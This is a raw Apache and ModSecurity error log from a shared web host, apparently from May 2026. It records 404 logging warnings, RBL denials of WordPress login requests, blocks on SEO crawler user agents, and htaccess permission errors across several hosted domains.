[Tue May 26 15:28:35.999756 2026] [security2:error] [pid 715645:tid 715901] [client 188.130.219.106:36311] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVuy3VGgMGh8k213Rj4HQAAAH4"], referer: https://anujtradingco.com
[Tue May 26 15:28:36.095967 2026] [security2:error] [pid 715645:tid 715894] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuzHVGgMGh8k213Rj4MgAAAHc"]
[Tue May 26 15:28:36.543927 2026] [security2:error] [pid 715645:tid 715787] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuzHVGgMGh8k213Rj4OAAAAAw"]
[Tue May 26 15:28:36.567984 2026] [security2:error] [pid 715645:tid 715898] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuzHVGgMGh8k213Rj4RQAAAHs"]
[Tue May 26 15:28:37.089942 2026] [security2:error] [pid 715645:tid 715843] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuzXVGgMGh8k213Rj4WgAAAEQ"]
[Tue May 26 15:28:37.504785 2026] [security2:error] [pid 715645:tid 715824] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuzXVGgMGh8k213Rj4ZwAAADE"]
[Tue May 26 15:28:37.876707 2026] [security2:error] [pid 715645:tid 715838] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuzXVGgMGh8k213Rj4dAAAAD8"]
[Tue May 26 15:28:38.304427 2026] [security2:error] [pid 715645:tid 715831] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuznVGgMGh8k213Rj4ewAAADg"]
[Tue May 26 15:28:38.694822 2026] [security2:error] [pid 715645:tid 715813] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuznVGgMGh8k213Rj4jQAAACY"]
[Tue May 26 15:28:38.779175 2026] [security2:error] [pid 715645:tid 715868] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuznVGgMGh8k213Rj4gQAAAF0"]
[Tue May 26 15:28:39.032833 2026] [security2:error] [pid 715645:tid 715875] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuznVGgMGh8k213Rj4mwAAAGQ"]
[Tue May 26 15:28:39.470881 2026] [security2:error] [pid 715645:tid 715837] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuz3VGgMGh8k213Rj4owAAAD4"]
[Tue May 26 15:28:39.622906 2026] [security2:error] [pid 715645:tid 715873] [client 31.57.184.107:59161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "asmchits.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVuz3VGgMGh8k213Rj4pwAAAGI"]
[Tue May 26 15:28:39.850100 2026] [security2:error] [pid 715645:tid 715865] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVuz3VGgMGh8k213Rj4sAAAAFo"]
[Tue May 26 15:28:40.323698 2026] [security2:error] [pid 715645:tid 715801] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu0HVGgMGh8k213Rj4wwAAABo"]
[Tue May 26 15:28:40.384416 2026] [security2:error] [pid 715645:tid 715889] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVuz3VGgMGh8k213Rj4uQAAAHI"]
[Tue May 26 15:28:40.697572 2026] [security2:error] [pid 715645:tid 715804] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu0HVGgMGh8k213Rj4zwAAAB0"]
[Tue May 26 15:28:41.193423 2026] [security2:error] [pid 715645:tid 715791] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu0XVGgMGh8k213Rj43gAAABA"]
[Tue May 26 15:28:41.661532 2026] [security2:error] [pid 715645:tid 715808] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu0XVGgMGh8k213Rj48AAAACE"]
[Tue May 26 15:28:42.037370 2026] [security2:error] [pid 715645:tid 715800] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu0XVGgMGh8k213Rj49gAAABk"]
[Tue May 26 15:28:42.383769 2026] [security2:error] [pid 715645:tid 715797] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu0nVGgMGh8k213Rj5BQAAABY"]
[Tue May 26 15:28:42.985007 2026] [security2:error] [pid 715645:tid 715898] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu0nVGgMGh8k213Rj5CwAAAHs"]
[Tue May 26 15:28:43.134767 2026] [security2:error] [pid 715645:tid 715788] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu03VGgMGh8k213Rj5HwAAAA0"]
[Tue May 26 15:28:43.512349 2026] [security2:error] [pid 715645:tid 715877] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu03VGgMGh8k213Rj5KQAAAGY"]
[Tue May 26 15:28:43.848332 2026] [security2:error] [pid 715645:tid 715891] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu03VGgMGh8k213Rj5NwAAAHQ"]
[Tue May 26 15:28:44.170368 2026] [security2:error] [pid 715645:tid 715882] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu1HVGgMGh8k213Rj5OwAAAGs"]
[Tue May 26 15:28:44.596303 2026] [security2:error] [pid 715645:tid 715900] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu1HVGgMGh8k213Rj5SgAAAH0"]
[Tue May 26 15:28:45.024010 2026] [security2:error] [pid 715645:tid 715844] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu1HVGgMGh8k213Rj5UQAAAEU"]
[Tue May 26 15:28:45.386559 2026] [security2:error] [pid 715645:tid 715872] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu1XVGgMGh8k213Rj5YAAAAGE"]
[Tue May 26 15:28:45.524810 2026] [security2:error] [pid 715645:tid 715842] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu1XVGgMGh8k213Rj5VwAAAEM"]
[Tue May 26 15:28:45.779075 2026] [security2:error] [pid 715645:tid 715824] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu1XVGgMGh8k213Rj5YwAAADE"]
[Tue May 26 15:28:45.963222 2026] [core:crit] [pid 715645:tid 715826] (13)Permission denied: [client 157.55.39.59:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:28:46.181034 2026] [security2:error] [pid 715645:tid 715816] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu1nVGgMGh8k213Rj5cgAAACk"]
[Tue May 26 15:28:46.518607 2026] [security2:error] [pid 715645:tid 715892] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu1nVGgMGh8k213Rj5egAAAHU"]
[Tue May 26 15:28:47.049304 2026] [security2:error] [pid 715645:tid 715858] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu1nVGgMGh8k213Rj5iQAAAFM"]
[Tue May 26 15:28:47.407643 2026] [security2:error] [pid 715645:tid 715881] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu13VGgMGh8k213Rj5kwAAAGo"]
[Tue May 26 15:28:47.463933 2026] [security2:error] [pid 715645:tid 715804] [client 185.191.171.5:54026] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-2nd/day/2023-01-31/"] [unique_id "ahVu13VGgMGh8k213Rj5lwAAAB0"]
[Tue May 26 15:28:47.464046 2026] [security2:error] [pid 715645:tid 715804] [client 185.191.171.5:54026] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/december-2nd/day/2023-01-31/"] [unique_id "ahVu13VGgMGh8k213Rj5lwAAAB0"]
[Tue May 26 15:28:47.802646 2026] [security2:error] [pid 715645:tid 715839] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu13VGgMGh8k213Rj5pgAAAEA"]
[Tue May 26 15:28:47.983471 2026] [security2:error] [pid 715645:tid 715782] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu13VGgMGh8k213Rj5ngAAAAc"]
[Tue May 26 15:28:48.223467 2026] [security2:error] [pid 715645:tid 715871] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu2HVGgMGh8k213Rj5rwAAAGA"]
[Tue May 26 15:28:48.773219 2026] [security2:error] [pid 715645:tid 715889] [client 185.192.71.180:24583] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu2HVGgMGh8k213Rj5wAAAAHI"]
[Tue May 26 15:28:49.101125 2026] [security2:error] [pid 715645:tid 715840] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu2XVGgMGh8k213Rj5zAAAAEE"]
[Tue May 26 15:28:49.580011 2026] [security2:error] [pid 715645:tid 715895] [client 185.192.71.180:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu2XVGgMGh8k213Rj53QAAAHg"]
[Tue May 26 15:28:49.891797 2026] [security2:error] [pid 715645:tid 715825] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu2XVGgMGh8k213Rj52AAAADI"]
[Tue May 26 15:28:50.698209 2026] [security2:error] [pid 715645:tid 715902] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu2nVGgMGh8k213Rj5_gAAAH8"]
[Tue May 26 15:28:51.159448 2026] [core:crit] [pid 715645:tid 715797] (13)Permission denied: [client 52.167.144.171:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:28:51.288340 2026] [security2:error] [pid 715645:tid 715658] [remote 216.73.216.251:29716] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahVu2nVGgMGh8k213Rj57gAAOww"]
[Tue May 26 15:28:51.335811 2026] [security2:error] [pid 715645:tid 715886] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu23VGgMGh8k213Rj6FwAAAG8"]
[Tue May 26 15:28:51.441324 2026] [security2:error] [pid 715645:tid 715847] [client 47.128.46.90:46690] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/en/k2/user/content/135-blogs"] [unique_id "ahVu23VGgMGh8k213Rj6GAAAAEg"]
[Tue May 26 15:28:51.615423 2026] [security2:error] [pid 715645:tid 715842] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu23VGgMGh8k213Rj6HgAAAEM"]
[Tue May 26 15:28:51.680566 2026] [security2:error] [pid 715645:tid 715861] [client 185.191.171.5:32188] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVu23VGgMGh8k213Rj6IgAAAFY"]
[Tue May 26 15:28:51.680734 2026] [security2:error] [pid 715645:tid 715861] [client 185.191.171.5:32188] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVu23VGgMGh8k213Rj6IgAAAFY"]
[Tue May 26 15:28:51.961907 2026] [core:crit] [pid 715645:tid 715808] (13)Permission denied: [client 52.167.144.171:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:28:52.151515 2026] [security2:error] [pid 715645:tid 715814] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu3HVGgMGh8k213Rj6LgAAACc"]
[Tue May 26 15:28:52.255416 2026] [security2:error] [pid 715645:tid 715817] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVu3HVGgMGh8k213Rj6NwAAACo"], referer: https://www.anujtradingco.com/
[Tue May 26 15:28:52.486349 2026] [security2:error] [pid 715645:tid 715800] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu3HVGgMGh8k213Rj6PgAAABk"]
[Tue May 26 15:28:52.629827 2026] [security2:error] [pid 715645:tid 715802] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu3HVGgMGh8k213Rj6NQAAABs"]
[Tue May 26 15:28:52.895792 2026] [security2:error] [pid 715645:tid 715867] [client 91.230.225.132:59703] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu3HVGgMGh8k213Rj6TgAAAFw"]
[Tue May 26 15:28:53.033874 2026] [security2:error] [pid 715645:tid 715898] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVu3HVGgMGh8k213Rj6VAAAAHs"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1418267&moderation-hash=9be30dabce180487f5f9cabe7d60938d
[Tue May 26 15:28:53.240357 2026] [security2:error] [pid 715645:tid 715851] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu3XVGgMGh8k213Rj6ZAAAAEw"]
[Tue May 26 15:28:53.613852 2026] [security2:error] [pid 715645:tid 715816] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu3XVGgMGh8k213Rj6eAAAACk"]
[Tue May 26 15:28:53.968969 2026] [security2:error] [pid 715645:tid 715821] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu3XVGgMGh8k213Rj6jwAAAC4"]
[Tue May 26 15:28:54.347195 2026] [security2:error] [pid 715645:tid 715894] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVu3XVGgMGh8k213Rj6kgAAAHc"]
[Tue May 26 15:28:54.673191 2026] [security2:error] [pid 715645:tid 715827] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu3nVGgMGh8k213Rj6owAAADQ"]
[Tue May 26 15:28:55.003520 2026] [autoindex:error] [pid 715645:tid 715891] [client 91.230.225.132:0] AH01276: Cannot serve directory /home1/moesartc/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:28:55.120451 2026] [security2:error] [pid 715645:tid 715672] [remote 109.205.180.55:35322] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVu3nVGgMGh8k213Rj6tAAAeRo"]
[Tue May 26 15:28:55.648373 2026] [security2:error] [pid 715645:tid 715800] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu33VGgMGh8k213Rj6zQAAABk"]
[Tue May 26 15:28:55.828848 2026] [security2:error] [pid 715645:tid 715663] [remote 95.216.117.13:57428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVu33VGgMGh8k213Rj60gAAABE"]
[Tue May 26 15:28:56.001373 2026] [security2:error] [pid 715645:tid 715776] [client 91.230.225.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVu33VGgMGh8k213Rj62QAAAAE"]
